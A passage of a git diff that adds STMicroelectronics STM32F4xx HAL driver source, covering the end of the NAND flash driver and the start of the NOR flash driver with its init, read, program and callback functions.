NAND_AddressTypeDef *pAddress) +{ + uint32_t deviceaddress = 0U; + uint32_t tickstart = 0U; + + /* Process Locked */ + __HAL_LOCK(hnand); + + /* Check the NAND controller state */ + if(hnand->State == HAL_NAND_STATE_BUSY) + { + return HAL_BUSY; + } + + /* Identify the device address */ + if(hnand->Init.NandBank == FMC_NAND_BANK2) + { + deviceaddress = NAND_DEVICE1; + } + else + { + deviceaddress = NAND_DEVICE2; + } + + /* Update the NAND controller state */ + hnand->State = HAL_NAND_STATE_BUSY; + + /* Send Erase block command sequence */ + *(__IO uint8_t *)((uint32_t)(deviceaddress | CMD_AREA)) = NAND_CMD_ERASE0; + + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = ADDR_1ST_CYCLE(ARRAY_ADDRESS(pAddress, hnand)); + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = ADDR_2ND_CYCLE(ARRAY_ADDRESS(pAddress, hnand)); + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = ADDR_3RD_CYCLE(ARRAY_ADDRESS(pAddress, hnand)); + + *(__IO uint8_t *)((uint32_t)(deviceaddress | CMD_AREA)) = NAND_CMD_ERASE1; + + /* Update the NAND controller state */ + hnand->State = HAL_NAND_STATE_READY; + + /* Get tick */ + tickstart = HAL_GetTick(); + + /* Read status until NAND is ready */ + while(HAL_NAND_Read_Status(hnand) != NAND_READY) + { + if((HAL_GetTick() - tickstart ) > NAND_WRITE_TIMEOUT) + { + /* Process unlocked */ + __HAL_UNLOCK(hnand); + + return HAL_TIMEOUT; + } + } + + /* Process unlocked */ + __HAL_UNLOCK(hnand); + + return HAL_OK; +} + +/** + * @brief NAND memory read status + * @param hnand pointer to a NAND_HandleTypeDef structure that contains + * the configuration information for NAND module. + * @retval NAND status + */ +uint32_t HAL_NAND_Read_Status(NAND_HandleTypeDef *hnand) +{ + uint32_t data = 0U; + uint32_t deviceaddress = 0U; + + /* Identify the device address */ + if(hnand->Init.NandBank == FMC_NAND_BANK2) + { + deviceaddress = NAND_DEVICE1; + } + else + { + deviceaddress = NAND_DEVICE2; + } + + /* Send Read status operation command */ + *(__IO uint8_t *)((uint32_t)(deviceaddress | CMD_AREA)) = NAND_CMD_STATUS; + + /* Read status register data */ + data = *(__IO uint8_t *)deviceaddress; + + /* Return the status */ + if((data & NAND_ERROR) == NAND_ERROR) + { + return NAND_ERROR; + } + else if((data & NAND_READY) == NAND_READY) + { + return NAND_READY; + } + + return NAND_BUSY; +} + +/** + * @brief Increment the NAND memory address + * @param hnand pointer to a NAND_HandleTypeDef structure that contains + * the configuration information for NAND module. + * @param pAddress pointer to NAND address structure + * @retval The new status of the increment address operation. It can be: + * - NAND_VALID_ADDRESS: When the new address is valid address + * - NAND_INVALID_ADDRESS: When the new address is invalid address + */ +uint32_t HAL_NAND_Address_Inc(NAND_HandleTypeDef *hnand, NAND_AddressTypeDef *pAddress) +{ + uint32_t status = NAND_VALID_ADDRESS; + + /* Increment page address */ + pAddress->Page++; + + /* Check NAND address is valid */ + if(pAddress->Page == hnand->Config.BlockSize) + { + pAddress->Page = 0U; + pAddress->Block++; + + if(pAddress->Block == hnand->Config.PlaneSize) + { + pAddress->Block = 0U; + pAddress->Plane++; + + if(pAddress->Plane == (hnand->Config.PlaneNbr)) + { + status = NAND_INVALID_ADDRESS; + } + } + } + + return (status); +} + +#if (USE_HAL_NAND_REGISTER_CALLBACKS == 1) +/** + * @brief Register a User NAND Callback + * To be used instead of the weak (surcharged) predefined callback + * @param hnand : NAND handle + * @param CallbackId : ID of the callback to be registered + * This parameter can be one of the following values: + * @arg @ref HAL_NAND_MSP_INIT_CB_ID NAND MspInit callback ID + * @arg @ref HAL_NAND_MSP_DEINIT_CB_ID NAND MspDeInit callback ID + * @arg @ref HAL_NAND_IT_CB_ID NAND IT callback ID + * @param pCallback : pointer to the Callback function + * @retval status + */ +HAL_StatusTypeDef HAL_NAND_RegisterCallback (NAND_HandleTypeDef *hnand, HAL_NAND_CallbackIDTypeDef CallbackId, pNAND_CallbackTypeDef pCallback) +{ + HAL_StatusTypeDef status = HAL_OK; + + if(pCallback == NULL) + { + return HAL_ERROR; + } + + /* Process locked */ + __HAL_LOCK(hnand); + + if(hnand->State == HAL_NAND_STATE_READY) + { + switch (CallbackId) + { + case HAL_NAND_MSP_INIT_CB_ID : + hnand->MspInitCallback = pCallback; + break; + case HAL_NAND_MSP_DEINIT_CB_ID : + hnand->MspDeInitCallback = pCallback; + break; + case HAL_NAND_IT_CB_ID : + hnand->ItCallback = pCallback; + break; + default : + /* update return status */ + status = HAL_ERROR; + break; + } + } + else if(hnand->State == HAL_NAND_STATE_RESET) + { + switch (CallbackId) + { + case HAL_NAND_MSP_INIT_CB_ID : + hnand->MspInitCallback = pCallback; + break; + case HAL_NAND_MSP_DEINIT_CB_ID : + hnand->MspDeInitCallback = pCallback; + break; + default : + /* update return status */ + status = HAL_ERROR; + break; + } + } + else + { + /* update return status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hnand); + return status; +} + +/** + * @brief Unregister a User NAND Callback + * NAND Callback is redirected to the weak (surcharged) predefined callback + * @param hnand : NAND handle + * @param CallbackId : ID of the callback to be unregistered + * This parameter can be one of the following values: + * @arg @ref HAL_NAND_MSP_INIT_CB_ID NAND MspInit callback ID + * @arg @ref HAL_NAND_MSP_DEINIT_CB_ID NAND MspDeInit callback ID + * @arg @ref HAL_NAND_IT_CB_ID NAND IT callback ID + * @retval status + */ +HAL_StatusTypeDef HAL_NAND_UnRegisterCallback (NAND_HandleTypeDef *hnand, HAL_NAND_CallbackIDTypeDef CallbackId) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Process locked */ + __HAL_LOCK(hnand); + + if(hnand->State == HAL_NAND_STATE_READY) + { + switch (CallbackId) + { + case HAL_NAND_MSP_INIT_CB_ID : + hnand->MspInitCallback = HAL_NAND_MspInit; + break; + case HAL_NAND_MSP_DEINIT_CB_ID : + hnand->MspDeInitCallback = HAL_NAND_MspDeInit; + break; + case HAL_NAND_IT_CB_ID : + hnand->ItCallback = HAL_NAND_ITCallback; + break; + default : + /* update return status */ + status = HAL_ERROR; + break; + } + } + else if(hnand->State == HAL_NAND_STATE_RESET) + { + switch (CallbackId) + { + case HAL_NAND_MSP_INIT_CB_ID : + hnand->MspInitCallback = HAL_NAND_MspInit; + break; + case HAL_NAND_MSP_DEINIT_CB_ID : + hnand->MspDeInitCallback = HAL_NAND_MspDeInit; + break; + default : + /* update return status */ + status = HAL_ERROR; + break; + } + } + else + { + /* update return status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hnand); + return status; +} +#endif + +/** + * @} + */ + +/** @defgroup NAND_Exported_Functions_Group3 Peripheral Control functions + * @brief management functions + * +@verbatim + ============================================================================== + ##### NAND Control functions ##### + ============================================================================== + [..] + This subsection provides a set of functions allowing to control dynamically + the NAND interface. + +@endverbatim + * @{ + */ + + +/** + * @brief Enables dynamically NAND ECC feature. + * @param hnand pointer to a NAND_HandleTypeDef structure that contains + * the configuration information for NAND module. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_NAND_ECC_Enable(NAND_HandleTypeDef *hnand) +{ + /* Check the NAND controller state */ + if(hnand->State == HAL_NAND_STATE_BUSY) + { + return HAL_BUSY; + } + + /* Update the NAND state */ + hnand->State = HAL_NAND_STATE_BUSY; + + /* Enable ECC feature */ + FMC_NAND_ECC_Enable(hnand->Instance, hnand->Init.NandBank); + + /* Update the NAND state */ + hnand->State = HAL_NAND_STATE_READY; + + return HAL_OK; +} + +/** + * @brief Disables dynamically FMC_NAND ECC feature. + * @param hnand pointer to a NAND_HandleTypeDef structure that contains + * the configuration information for NAND module. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_NAND_ECC_Disable(NAND_HandleTypeDef *hnand) +{ + /* Check the NAND controller state */ + if(hnand->State == HAL_NAND_STATE_BUSY) + { + return HAL_BUSY; + } + + /* Update the NAND state */ + hnand->State = HAL_NAND_STATE_BUSY; + + /* Disable ECC feature */ + FMC_NAND_ECC_Disable(hnand->Instance, hnand->Init.NandBank); + + /* Update the NAND state */ + hnand->State = HAL_NAND_STATE_READY; + + return HAL_OK; +} + +/** + * @brief Disables dynamically NAND ECC feature. + * @param hnand pointer to a NAND_HandleTypeDef structure that contains + * the configuration information for NAND module. + * @param ECCval pointer to ECC value + * @param Timeout maximum timeout to wait + * @retval HAL status + */ +HAL_StatusTypeDef HAL_NAND_GetECC(NAND_HandleTypeDef *hnand, uint32_t *ECCval, uint32_t Timeout) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Check the NAND controller state */ + if(hnand->State == HAL_NAND_STATE_BUSY) + { + return HAL_BUSY; + } + + /* Update the NAND state */ + hnand->State = HAL_NAND_STATE_BUSY; + + /* Get NAND ECC value */ + status = FMC_NAND_GetECC(hnand->Instance, ECCval, hnand->Init.NandBank, Timeout); + + /* Update the NAND state */ + hnand->State = HAL_NAND_STATE_READY; + + return status; +} + +/** + * @} + */ + + +/** @defgroup NAND_Exported_Functions_Group4 Peripheral State functions + * @brief Peripheral State functions + * +@verbatim + ============================================================================== + ##### NAND State functions ##### + ============================================================================== + [..] + This subsection permits to get in run-time the status of the NAND controller + and the data flow. + +@endverbatim + * @{ + */ + +/** + * @brief return the NAND state + * @param hnand pointer to a NAND_HandleTypeDef structure that contains + * the configuration information for NAND module. + * @retval HAL state + */ +HAL_NAND_StateTypeDef HAL_NAND_GetState(NAND_HandleTypeDef *hnand) +{ + return hnand->State; +} + +/** + * @} + */ + +/** + * @} + */ + +/** + * @} + */ + +#endif /* STM32F405xx || STM32F415xx || STM32F407xx || STM32F417xx ||\ + STM32F427xx || STM32F437xx || STM32F429xx || STM32F439xx ||\ + STM32F446xx || STM32F469xx || STM32F479xx */ +#endif /* HAL_NAND_MODULE_ENABLED */ + +/** + * @} + */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_nor.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_nor.c new file mode 100644 index 000000000..34a009caf --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_nor.c @@ -0,0 +1,1193 @@ +/** + ****************************************************************************** + * @file stm32f4xx_hal_nor.c + * @author MCD Application Team + * @brief NOR HAL module driver. + * This file provides a generic firmware to drive NOR memories mounted + * as external device. + * + @verbatim + ============================================================================== + ##### How to use this driver ##### + ============================================================================== + [..] + This driver is a generic layered driver which contains a set of APIs used to + control NOR flash memories. It uses the FMC/FSMC layer functions to interface + with NOR devices. This driver is used as follows: + + (+) NOR flash memory configuration sequence using the function HAL_NOR_Init() + with control and timing parameters for both normal and extended mode. + + (+) Read NOR flash memory manufacturer code and device IDs using the function + HAL_NOR_Read_ID(). The read information is stored in the NOR_ID_TypeDef + structure declared by the function caller. + + (+) Access NOR flash memory by read/write data unit operations using the functions + HAL_NOR_Read(), HAL_NOR_Program(). + + (+) Perform NOR flash erase block/chip operations using the functions + HAL_NOR_Erase_Block() and HAL_NOR_Erase_Chip(). + + (+) Read the NOR flash CFI (common flash interface) IDs using the function + HAL_NOR_Read_CFI(). The read information is stored in the NOR_CFI_TypeDef + structure declared by the function caller. + + (+) You can also control the NOR device by calling the control APIs HAL_NOR_WriteOperation_Enable()/ + HAL_NOR_WriteOperation_Disable() to respectively enable/disable the NOR write operation + + (+) You can monitor the NOR device HAL state by calling the function + HAL_NOR_GetState() + [..] + (@) This driver is a set of generic APIs which handle standard NOR flash operations. + If a NOR flash device contains different operations and/or implementations, + it should be implemented separately. + + *** NOR HAL driver macros list *** + ============================================= + [..] + Below the list of most used macros in NOR HAL driver. + + (+) NOR_WRITE : NOR memory write data to specified address + + *** Callback registration *** + ============================================= + [..] + The compilation define USE_HAL_NOR_REGISTER_CALLBACKS when set to 1 + allows the user to configure dynamically the driver callbacks. + + Use Functions @ref HAL_NOR_RegisterCallback() to register a user callback, + it allows to register following callbacks: + (+) MspInitCallback : NOR MspInit. + (+) MspDeInitCallback : NOR MspDeInit. + This function takes as parameters the HAL peripheral handle, the Callback ID + and a pointer to the user callback function. + + Use function @ref HAL_NOR_UnRegisterCallback() to reset a callback to the default + weak (surcharged) function. It allows to reset following callbacks: + (+) MspInitCallback : NOR MspInit. + (+) MspDeInitCallback : NOR MspDeInit. + This function) takes as parameters the HAL peripheral handle and the Callback ID. + + By default, after the @ref HAL_NOR_Init and if the state is HAL_NOR_STATE_RESET + all callbacks are reset to the corresponding legacy weak (surcharged) functions. + Exception done for MspInit and MspDeInit callbacks that are respectively + reset to the legacy weak (surcharged) functions in the @ref HAL_NOR_Init + and @ref HAL_NOR_DeInit only when these callbacks are null (not registered beforehand). + If not, MspInit or MspDeInit are not null, the @ref HAL_NOR_Init and @ref HAL_NOR_DeInit + keep and use the user MspInit/MspDeInit callbacks (registered beforehand) + + Callbacks can be registered/unregistered in READY state only. + Exception done for MspInit/MspDeInit callbacks that can be registered/unregistered + in READY or RESET state, thus registered (user) MspInit/DeInit callbacks can be used + during the Init/DeInit. + In that case first register the MspInit/MspDeInit user callbacks + using @ref HAL_NOR_RegisterCallback before calling @ref HAL_NOR_DeInit + or @ref HAL_NOR_Init function. + + When The compilation define USE_HAL_NOR_REGISTER_CALLBACKS is set to 0 or + not defined, the callback registering feature is not available + and weak (surcharged) callbacks are used. + + @endverbatim + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2017 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_hal.h" + +/** @addtogroup STM32F4xx_HAL_Driver + * @{ + */ + +/** @defgroup NOR NOR + * @brief NOR driver modules + * @{ + */ +#ifdef HAL_NOR_MODULE_ENABLED +#if defined(STM32F405xx) || defined(STM32F415xx) || defined(STM32F407xx) || defined(STM32F417xx) ||\ + defined(STM32F427xx) || defined(STM32F437xx) || defined(STM32F429xx) || defined(STM32F439xx) ||\ + defined(STM32F446xx) || defined(STM32F469xx) || defined(STM32F479xx) || defined(STM32F412Zx) ||\ + defined(STM32F412Vx) || defined(STM32F412Rx) || defined(STM32F413xx) || defined(STM32F423xx) +/* Private typedef -----------------------------------------------------------*/ +/* Private define ------------------------------------------------------------*/ + +/** @defgroup NOR_Private_Defines NOR Private Defines + * @{ + */ + +/* Constants to define address to set to write a command */ +#define NOR_CMD_ADDRESS_FIRST (uint16_t)0x0555 +#define NOR_CMD_ADDRESS_FIRST_CFI (uint16_t)0x0055 +#define NOR_CMD_ADDRESS_SECOND (uint16_t)0x02AA +#define NOR_CMD_ADDRESS_THIRD (uint16_t)0x0555 +#define NOR_CMD_ADDRESS_FOURTH (uint16_t)0x0555 +#define NOR_CMD_ADDRESS_FIFTH (uint16_t)0x02AA +#define NOR_CMD_ADDRESS_SIXTH (uint16_t)0x0555 + +/* Constants to define data to program a command */ +#define NOR_CMD_DATA_READ_RESET (uint16_t)0x00F0 +#define NOR_CMD_DATA_FIRST (uint16_t)0x00AA +#define NOR_CMD_DATA_SECOND (uint16_t)0x0055 +#define NOR_CMD_DATA_AUTO_SELECT (uint16_t)0x0090 +#define NOR_CMD_DATA_PROGRAM (uint16_t)0x00A0 +#define NOR_CMD_DATA_CHIP_BLOCK_ERASE_THIRD (uint16_t)0x0080 +#define NOR_CMD_DATA_CHIP_BLOCK_ERASE_FOURTH (uint16_t)0x00AA +#define NOR_CMD_DATA_CHIP_BLOCK_ERASE_FIFTH (uint16_t)0x0055 +#define NOR_CMD_DATA_CHIP_ERASE (uint16_t)0x0010 +#define NOR_CMD_DATA_CFI (uint16_t)0x0098 + +#define NOR_CMD_DATA_BUFFER_AND_PROG (uint8_t)0x25 +#define NOR_CMD_DATA_BUFFER_AND_PROG_CONFIRM (uint8_t)0x29 +#define NOR_CMD_DATA_BLOCK_ERASE (uint8_t)0x30 + +/* Mask on NOR STATUS REGISTER */ +#define NOR_MASK_STATUS_DQ5 (uint16_t)0x0020 +#define NOR_MASK_STATUS_DQ6 (uint16_t)0x0040 + +/** + * @} + */ + +/* Private macro -------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +/** @defgroup NOR_Private_Variables NOR Private Variables + * @{ + */ + +static uint32_t uwNORMemoryDataWidth = NOR_MEMORY_8B; + +/** + * @} + */ + +/* Private functions ---------------------------------------------------------*/ +/* Exported functions --------------------------------------------------------*/ +/** @defgroup NOR_Exported_Functions NOR Exported Functions + * @{ + */ + +/** @defgroup NOR_Exported_Functions_Group1 Initialization and de-initialization functions + * @brief Initialization and Configuration functions + * + @verbatim + ============================================================================== + ##### NOR Initialization and de_initialization functions ##### + ============================================================================== + [..] + This section provides functions allowing to initialize/de-initialize + the NOR memory + +@endverbatim + * @{ + */ + +/** + * @brief Perform the NOR memory Initialization sequence + * @param hnor pointer to a NOR_HandleTypeDef structure that contains + * the configuration information for NOR module. + * @param Timing pointer to NOR control timing structure + * @param ExtTiming pointer to NOR extended mode timing structure + * @retval HAL status + */ +HAL_StatusTypeDef HAL_NOR_Init(NOR_HandleTypeDef *hnor, FMC_NORSRAM_TimingTypeDef *Timing, FMC_NORSRAM_TimingTypeDef *ExtTiming) +{ + /* Check the NOR handle parameter */ + if(hnor == NULL) + { + return HAL_ERROR; + } + + if(hnor->State == HAL_NOR_STATE_RESET) + { + /* Allocate lock resource and initialize it */ + hnor->Lock = HAL_UNLOCKED; + +#if (USE_HAL_NOR_REGISTER_CALLBACKS == 1) + if(hnor->MspInitCallback == NULL) + { + hnor->MspInitCallback = HAL_NOR_MspInit; + } + + /* Init the low level hardware */ + hnor->MspInitCallback(hnor); +#else + /* Initialize the low level hardware (MSP) */ + HAL_NOR_MspInit(hnor); +#endif /* (USE_HAL_NOR_REGISTER_CALLBACKS) */ + } + + /* Initialize NOR control Interface */ + FMC_NORSRAM_Init(hnor->Instance, &(hnor->Init)); + + /* Initialize NOR timing Interface */ + FMC_NORSRAM_Timing_Init(hnor->Instance, Timing, hnor->Init.NSBank); + + /* Initialize NOR extended mode timing Interface */ + FMC_NORSRAM_Extended_Timing_Init(hnor->Extended, ExtTiming, hnor->Init.NSBank, hnor->Init.ExtendedMode); + + /* Enable the NORSRAM device */ + __FMC_NORSRAM_ENABLE(hnor->Instance, hnor->Init.NSBank); + + /* Initialize NOR Memory Data Width*/ + if (hnor->Init.MemoryDataWidth == FMC_NORSRAM_MEM_BUS_WIDTH_8) + { + uwNORMemoryDataWidth = NOR_MEMORY_8B; + } + else + { + uwNORMemoryDataWidth = NOR_MEMORY_16B; + } + + /* Check the NOR controller state */ + hnor->State = HAL_NOR_STATE_READY; + + return HAL_OK; +} + +/** + * @brief Perform NOR memory De-Initialization sequence + * @param hnor pointer to a NOR_HandleTypeDef structure that contains + * the configuration information for NOR module. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_NOR_DeInit(NOR_HandleTypeDef *hnor) +{ +#if (USE_HAL_NOR_REGISTER_CALLBACKS == 1) + if(hnor->MspDeInitCallback == NULL) + { + hnor->MspDeInitCallback = HAL_NOR_MspDeInit; + } + + /* DeInit the low level hardware */ + hnor->MspDeInitCallback(hnor); +#else + /* De-Initialize the low level hardware (MSP) */ + HAL_NOR_MspDeInit(hnor); +#endif /* (USE_HAL_NOR_REGISTER_CALLBACKS) */ + + /* Configure the NOR registers with their reset values */ + FMC_NORSRAM_DeInit(hnor->Instance, hnor->Extended, hnor->Init.NSBank); + + /* Update the NOR controller state */ + hnor->State = HAL_NOR_STATE_RESET; + + /* Release Lock */ + __HAL_UNLOCK(hnor); + + return HAL_OK; +} + +/** + * @brief NOR MSP Init + * @param hnor pointer to a NOR_HandleTypeDef structure that contains + * the configuration information for NOR module. + * @retval None + */ +__weak void HAL_NOR_MspInit(NOR_HandleTypeDef *hnor) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hnor); + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_NOR_MspInit could be implemented in the user file + */ +} + +/** + * @brief NOR MSP DeInit + * @param hnor pointer to a NOR_HandleTypeDef structure that contains + * the configuration information for NOR module. + * @retval None + */ +__weak void HAL_NOR_MspDeInit(NOR_HandleTypeDef *hnor) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hnor); + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_NOR_MspDeInit could be implemented in the user file + */ +} + +/** + * @brief NOR MSP Wait for Ready/Busy signal + * @param hnor pointer to a NOR_HandleTypeDef structure that contains + * the configuration information for NOR module. + * @param Timeout Maximum timeout value + * @retval None + */ +__weak void HAL_NOR_MspWait(NOR_HandleTypeDef *hnor, uint32_t Timeout) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hnor); + UNUSED(Timeout); + + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_NOR_MspWait could be implemented in the user file + */ +} + +/** + * @} + */ + +/** @defgroup NOR_Exported_Functions_Group2 Input and Output functions + * @brief Input Output and memory control functions + * + @verbatim + ============================================================================== + ##### NOR Input and Output functions ##### + ============================================================================== + [..] + This section provides functions allowing to use and control the NOR memory + +@endverbatim + * @{ + */ + +/** + * @brief Read NOR flash IDs + * @param hnor pointer to a NOR_HandleTypeDef structure that contains + * the configuration information for NOR module. + * @param pNOR_ID pointer to NOR ID structure + * @retval HAL status + */ +HAL_StatusTypeDef HAL_NOR_Read_ID(NOR_HandleTypeDef *hnor, NOR_IDTypeDef *pNOR_ID) +{ + uint32_t deviceaddress = 0U; + + /* Process Locked */ + __HAL_LOCK(hnor); + + /* Check the NOR controller state */ + if(hnor->State == HAL_NOR_STATE_BUSY) + { + return HAL_BUSY; + } + + /* Select the NOR device address */ + if (hnor->Init.NSBank == FMC_NORSRAM_BANK1) + { + deviceaddress = NOR_MEMORY_ADRESS1; + } + else if (hnor->Init.NSBank == FMC_NORSRAM_BANK2) + { + deviceaddress = NOR_MEMORY_ADRESS2; + } + else if (hnor->Init.NSBank == FMC_NORSRAM_BANK3) + { + deviceaddress = NOR_MEMORY_ADRESS3; + } + else /* FMC_NORSRAM_BANK4 */ + { + deviceaddress = NOR_MEMORY_ADRESS4; + } + + /* Update the NOR controller state */ + hnor->State = HAL_NOR_STATE_BUSY; + + /* Send read ID command */ + NOR_WRITE(NOR_ADDR_SHIFT(deviceaddress, uwNORMemoryDataWidth, NOR_CMD_ADDRESS_FIRST), NOR_CMD_DATA_FIRST); + NOR_WRITE(NOR_ADDR_SHIFT(deviceaddress, uwNORMemoryDataWidth, NOR_CMD_ADDRESS_SECOND), NOR_CMD_DATA_SECOND); + NOR_WRITE(NOR_ADDR_SHIFT(deviceaddress, uwNORMemoryDataWidth, NOR_CMD_ADDRESS_THIRD), NOR_CMD_DATA_AUTO_SELECT); + + /* Read the NOR IDs */ + pNOR_ID->Manufacturer_Code = *(__IO uint16_t *) NOR_ADDR_SHIFT(deviceaddress, uwNORMemoryDataWidth, MC_ADDRESS); + pNOR_ID->Device_Code1 = *(__IO uint16_t *) NOR_ADDR_SHIFT(deviceaddress, uwNORMemoryDataWidth, DEVICE_CODE1_ADDR); + pNOR_ID->Device_Code2 = *(__IO uint16_t *) NOR_ADDR_SHIFT(deviceaddress, uwNORMemoryDataWidth, DEVICE_CODE2_ADDR); + pNOR_ID->Device_Code3 = *(__IO uint16_t *) NOR_ADDR_SHIFT(deviceaddress, uwNORMemoryDataWidth, DEVICE_CODE3_ADDR); + + /* Check the NOR controller state */ + hnor->State = HAL_NOR_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hnor); + + return HAL_OK; +} + +/** + * @brief Returns the NOR memory to Read mode. + * @param hnor pointer to a NOR_HandleTypeDef structure that contains + * the configuration information for NOR module. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_NOR_ReturnToReadMode(NOR_HandleTypeDef *hnor) +{ + uint32_t deviceaddress = 0U; + + /* Process Locked */ + __HAL_LOCK(hnor); + + /* Check the NOR controller state */ + if(hnor->State == HAL_NOR_STATE_BUSY) + { + return HAL_BUSY; + } + + /* Select the NOR device address */ + if (hnor->Init.NSBank == FMC_NORSRAM_BANK1) + { + deviceaddress = NOR_MEMORY_ADRESS1; + } + else if (hnor->Init.NSBank == FMC_NORSRAM_BANK2) + { + deviceaddress = NOR_MEMORY_ADRESS2; + } + else if (hnor->Init.NSBank == FMC_NORSRAM_BANK3) + { + deviceaddress = NOR_MEMORY_ADRESS3; + } + else /* FMC_NORSRAM_BANK4 */ + { + deviceaddress = NOR_MEMORY_ADRESS4; + } + + NOR_WRITE(deviceaddress, NOR_CMD_DATA_READ_RESET); + + /* Check the NOR controller state */ + hnor->State = HAL_NOR_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hnor); + + return HAL_OK; +} + +/** + * @brief Read data from NOR memory + * @param hnor pointer to a NOR_HandleTypeDef structure that contains + * the configuration information for NOR module. + * @param pAddress pointer to Device address + * @param pData pointer to read data + * @retval HAL status + */ +HAL_StatusTypeDef HAL_NOR_Read(NOR_HandleTypeDef *hnor, uint32_t *pAddress, uint16_t *pData) +{ + uint32_t deviceaddress = 0U; + + /* Process Locked */ + __HAL_LOCK(hnor); + + /* Check the NOR controller state */ + if(hnor->State == HAL_NOR_STATE_BUSY) + { + return HAL_BUSY; + } + + /* Select the NOR device address */ + if (hnor->Init.NSBank == FMC_NORSRAM_BANK1) + { + deviceaddress = NOR_MEMORY_ADRESS1; + } + else if (hnor->Init.NSBank == FMC_NORSRAM_BANK2) + { + deviceaddress = NOR_MEMORY_ADRESS2; + } + else if (hnor->Init.NSBank == FMC_NORSRAM_BANK3) + { + deviceaddress = NOR_MEMORY_ADRESS3; + } + else /* FMC_NORSRAM_BANK4 */ + { + deviceaddress = NOR_MEMORY_ADRESS4; + } + + /* Update the NOR controller state */ + hnor->State = HAL_NOR_STATE_BUSY; + + /* Send read data command */ + NOR_WRITE(NOR_ADDR_SHIFT(deviceaddress, uwNORMemoryDataWidth, NOR_CMD_ADDRESS_FIRST), NOR_CMD_DATA_FIRST); + NOR_WRITE(NOR_ADDR_SHIFT(deviceaddress, uwNORMemoryDataWidth, NOR_CMD_ADDRESS_SECOND), NOR_CMD_DATA_SECOND); + NOR_WRITE(NOR_ADDR_SHIFT(deviceaddress, uwNORMemoryDataWidth, NOR_CMD_ADDRESS_THIRD), NOR_CMD_DATA_READ_RESET); + + /* Read the data */ + *pData = *(__IO uint32_t *)(uint32_t)pAddress; + + /* Check the NOR controller state */ + hnor->State = HAL_NOR_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hnor); + + return HAL_OK; +} + +/** + * @brief Program data to NOR memory + * @param hnor pointer to a NOR_HandleTypeDef structure that contains + * the configuration information for NOR module. + * @param pAddress Device address + * @param pData pointer to the data to write + * @retval HAL status + */ +HAL_StatusTypeDef HAL_NOR_Program(NOR_HandleTypeDef *hnor, uint32_t *pAddress, uint16_t *pData) +{ + uint32_t deviceaddress = 0U; + + /* Process Locked */ + __HAL_LOCK(hnor); + + /* Check the NOR controller state */ + if(hnor->State == HAL_NOR_STATE_BUSY) + { + return HAL_BUSY; + } + + /* Select the NOR device address */ + if (hnor->Init.NSBank == FMC_NORSRAM_BANK1) + { + deviceaddress = NOR_MEMORY_ADRESS1; + } + else if (hnor->Init.NSBank == FMC_NORSRAM_BANK2) + { + deviceaddress = NOR_MEMORY_ADRESS2; + } + else if (hnor->Init.NSBank == FMC_NORSRAM_BANK3) + { + deviceaddress = NOR_MEMORY_ADRESS3; + } + else /* FMC_NORSRAM_BANK4 */ + { + deviceaddress = NOR_MEMORY_ADRESS4; + } + + /* Update the NOR controller state */ + hnor->State = HAL_NOR_STATE_BUSY; + + /* Send program data command */ + NOR_WRITE(NOR_ADDR_SHIFT(deviceaddress, uwNORMemoryDataWidth, NOR_CMD_ADDRESS_FIRST), NOR_CMD_DATA_FIRST); + NOR_WRITE(NOR_ADDR_SHIFT(deviceaddress, uwNORMemoryDataWidth, NOR_CMD_ADDRESS_SECOND), NOR_CMD_DATA_SECOND); + NOR_WRITE(NOR_ADDR_SHIFT(deviceaddress, uwNORMemoryDataWidth, NOR_CMD_ADDRESS_THIRD), NOR_CMD_DATA_PROGRAM); + + /* Write the data */ + NOR_WRITE(pAddress, *pData); + + /* Check the NOR controller state */ + hnor->State = HAL_NOR_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hnor); + + return HAL_OK; +} + +/** + * @brief Reads a half-word buffer from the NOR memory. + * @param hnor pointer to the NOR handle + * @param uwAddress NOR memory internal address to read from. + * @param pData pointer to the buffer that receives the data read from the + * NOR memory. + * @param uwBufferSize number of Half word to read. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_NOR_ReadBuffer(NOR_HandleTypeDef *hnor, uint32_t uwAddress, uint16_t *pData, uint32_t uwBufferSize) +{ + uint32_t deviceaddress = 0U; + + /* Process Locked */ + __HAL_LOCK(hnor); + + /* Check the NOR controller state */ + if(hnor->State == HAL_NOR_STATE_BUSY) + { + return HAL_BUSY; + } + + /* Select the NOR device address */ + if (hnor->Init.NSBank == FMC_NORSRAM_BANK1) + { + deviceaddress = NOR_MEMORY_ADRESS1; + } + else if (hnor->Init.NSBank == FMC_NORSRAM_BANK2) + { + deviceaddress = NOR_MEMORY_ADRESS2; + } + else if (hnor->Init.NSBank == FMC_NORSRAM_BANK3) + { + deviceaddress = NOR_MEMORY_ADRESS3; + } + else /* FMC_NORSRAM_BANK4 */ + { + deviceaddress = 